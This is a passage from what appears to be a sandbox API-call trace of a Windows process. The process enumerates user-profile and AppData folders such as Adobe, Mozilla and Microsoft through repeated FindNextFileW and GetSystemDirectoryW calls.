cAlternateFileName="TEMPLA~1")) returned 1 [0135.609] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0135.609] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.610] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0135.610] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0135.610] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0135.610] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0135.610] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0135.610] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0135.611] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0135.611] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0135.611] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0135.611] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0135.611] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0135.611] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0135.612] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0135.612] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeffc | out: lpFindFileData=0x2aeffc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0135.612] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.612] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.612] CoTaskMemFree (pv=0x4e1c10) [0135.613] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.613] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0135.613] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0135.613] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 0 [0135.614] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.614] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0135.614] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0135.614] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0135.615] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.615] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.615] CoTaskMemFree (pv=0x4e1c10) [0135.615] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.615] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0135.615] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0135.616] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.616] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0135.617] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0135.617] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.617] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.617] CoTaskMemFree (pv=0x4e1c10) [0135.617] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.618] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 1 [0135.618] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 0 [0135.618] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.618] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 1 [0135.618] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0135.619] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.619] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.619] CoTaskMemFree (pv=0x4e1c10) [0135.619] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.619] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0135.620] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 0 [0135.620] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.620] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0135.620] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0135.620] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0135.620] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.621] CoTaskMemFree (pv=0x4e1c10) [0135.621] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0135.621] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1df, dwReserved0=0x0, dwReserved1=0x0, cFileName="directories.acrodata", cAlternateFileName="DIRECT~1.ACR")) returned 1 [0135.621] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0135.622] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) 